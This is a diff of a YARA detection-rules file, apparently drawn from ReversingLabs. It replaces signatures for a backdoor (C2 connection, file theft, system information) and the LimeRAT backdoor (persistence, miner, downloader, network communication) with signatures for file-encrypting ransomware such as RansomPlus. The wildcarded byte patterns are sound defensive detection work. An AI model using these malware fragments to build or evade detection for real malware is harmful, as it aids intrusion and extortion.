-            8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B CB 0F 86 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? 8D 64 24 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
-            C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 83 C4 ?? 8B D0 8B FF 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C2
-            83 C7 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 66 8B 4F ?? 83 C7 ?? 66 3B CB 75 ?? DF 6C 24 ??
-            8B C8 C1 E9 ?? 8B F2 DC 05 ?? ?? ?? ?? F3 A5 DD 1D ?? ?? ?? ?? 8B C8 68
+		$encrypt_files_p1 = {
+            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
+            8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13
+            ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ??
+            17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 1F ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ??
+            ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 11 ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ??
+            26 DE ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 11 ??
+            A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 2C ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
+            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 11 ??
+            72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
         }
-		$find_files_and_get_file_data_p4 = {
-            8D 84 24 ?? ?? ?? ?? 83 E1 ?? 8D 94 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? F3 A4 89
-            94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 51 8B 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 94 24 ?? ??
-            ?? ?? 3B C2 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24
-            ?? ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 83 CA ?? 8D 48 ?? F0 0F C1 11 4A 85 D2 7F ?? 8B
-            08 8B 11 50 8B 42 ?? FF D0 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? 8B 44 24 ?? 83 C0
-            ?? 8D 50 ?? 83 C9 ?? F0 0F C1 0A 49 85 C9 7F ?? 8B 08 8B 11 50 8B 42 ?? FF D0 8D 8C
-            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81
-            C4 ?? ?? ?? ?? C3
+		$encrypt_files_p2 = {
+            02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 17 9A 28 ?? ?? ?? ?? 13 ?? 02
+            18 9A 28 ?? ?? ?? ?? 2C ?? 02 18 9A 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 02 18 9A 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 18
+            9A 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 2A 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 18 8D ?? ??
+            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 00
+            1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 08 20 ?? ?? ??
+            ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
+            25 1A 11 ?? 08 11 ?? 8E 69 6F ?? ?? ?? ?? 9A A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 11 ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
+            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11
+            ?? 1F ?? 3F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 17
+            6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2A
         }
-		$receive_data_and_write_to_file = {
-            C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ??
-            ?? ?? ?? 8B 7C 24 ?? 8B F0 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 68 ?? ??
-            ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B D4 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 52 FF 15 ?? ?? ??
-            ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4C 24 ??
-            51 56 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 01 15 ?? ?? ?? ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B C4 C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 E9
+		$find_files_p1 = {
+            73 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 16 28 ?? ??
+            ?? ?? 02 8E 39 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 16 0D
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 17 0D 20 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 1F ?? 1B 28 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 13 ?? 6F ?? ?? ?? ?? 13 ?? 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 11 ?? 16 11
+            ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 13 ?? 1C 8D ?? ?? ?? ?? 25 16
+            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ??
+            A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 13 ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72
+            ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
+            25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 72 ?? ??
+            ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
         }
-		$get_system_information = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
-            53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
-            33 F6 BD ?? ?? ?? ?? 83 CF ?? E8 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 66
-            89 44 24 ?? 88 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 3B C6 74 ?? 8D 9B ?? ?? ?? ??
-            A8 ?? 74 ?? 8D 54 24 ?? 52 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ??
-            89 74 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 89
-            7C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? FE 44 24 ?? D1 E8 89 44 24 ?? 75 ?? 8D 4C 24
-            ?? 51 E8 ?? ?? ?? ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D3 83 ED ?? 0F
-            85 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 4C 24 ?? 33 CC E8
-            ?? ?? ?? ?? 83 C4 ?? C3
+		$find_files_p2 = {
+            A2 13 ?? 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 1C 32 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 13 ??
+            16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 13 ??
+            16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2C ?? 12 ?? 11 ?? 8E 69 17 58 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 6F ?? ?? ?? ?? 11 ??
+            A2 2B
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $connect_to_c2 ) and ( all of ( $find_files_and_get_file_data_p* ) ) and ( $receive_data_and_write_to_file ) and ( $get_system_information )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $internal_encrypt_file )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Limerat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Ransomplus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects LimeRAT backdoor."
+		description = "Yara rule that detects RansomPlus ransomware."
 		author = "ReversingLabs"
-		id = "c2ef6f27-3fb8-55f4-97a6-9e25a3d1ce49"
-		date = "2024-03-04"
-		modified = "2024-03-04"
+		id = "ee96eab6-104d-560f-adae-6d5f0ba5d469"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.LimeRAT.yara#L1-L91"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RansomPlus.yara#L1-L95"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "03eaa2ac41950f036601222b32a28c03aae3b3445501e988e2f87e231a1a1522"
+		logic_hash = "8ab18c6bcb939eac0e74f015dea773141b5086c5fcb4783666eeac1f395bc208"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "LimeRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RansomPlus"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$persistence_mechanism = {
-            02 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 2B ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? DE
-        }
-		$crypto_miner = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 16 31 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 0B 07 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ??
-            ?? ?? 74 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 0A DE ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09
-            6F ?? ?? ?? ?? DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ??
-            0A DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 06
+		$find_files_1_0 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 EC ??
+            8B CC 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 01 ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ??
+            ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ??
+            ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ??
+            68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
         }
-		$downloader = {
-            73 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2C ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 7E ?? ?? ?? ?? 07 6F ??
-            ?? ?? ?? 07 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ??
-            06 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 26 00 06 6F ?? ?? ?? ?? 14 0A
-            DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? DE ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ??
-            ?? ?? DE
+		$find_files_1_1 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8D 8D ?? ?? ?? ?? 51 50 FF 15 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 95 ?? ?? ?? ??
+            41 81 F9 ?? ?? ?? ?? 72 ?? F6 C2 ?? 74 ?? E8 ?? ?? ?? ?? 8B 42 ?? 3B C2 72 ?? E8 ??
+            ?? ?? ?? 2B D0 83 FA ?? 73 ?? E8 ?? ?? ?? ?? 83 FA ?? 76 ?? E8 ?? ?? ?? ?? 8B D0 52
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 83 FB ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 32 DB E9 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? C6 45 ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85
         }
-		$network_communication_p1 = {
-            16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0B 28 ?? ??
-            ?? ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ??
-            ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ??
-            DE ?? 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 6F ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 15 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 14 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ??
-            25 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 14 14 14 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 9A 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 26 11
-            ?? 73 ?? ?? ?? ?? 17 11 ?? 8E 69 6F ?? ?? ?? ?? 9A 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C
-            ?? 11 ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 17 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 ??
-            ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 28 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2
+		$find_files_1_2 = {
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB
+            ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 55 ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ??
+            8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1
+            6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D
+            ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 FE ?? 0F 43 C2 0F 43 CA 89 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 03 C1 83 FE ?? 8B F8 0F 43 DA 33 C9 2B FB 33 F6 3B D8 0F 47 F9 85
+            FF 74 ?? 0F BE 04 33 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 88 04 31 46 3B F7
+            75 ?? 33 C0 89 85 ?? ?? ?? ?? 8B 94 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D
+            71 ?? 8A 01 41 84 C0 75 ?? 2B CE 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 F9 ?? 0F
+            43 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 C2 03 85 ?? ?? ?? ?? 83 F9 ?? 8B F8
+            0F 43 DA 33 F6 2B FB 3B D8 0F 47 FE 85 FF 74
         }
-		$network_communication_p2 = {
-            25 1A 28 ?? ?? ?? ?? A2 25 1B 7E ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 7E ??
-            ?? ?? ?? A2 25 1E 28 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ??
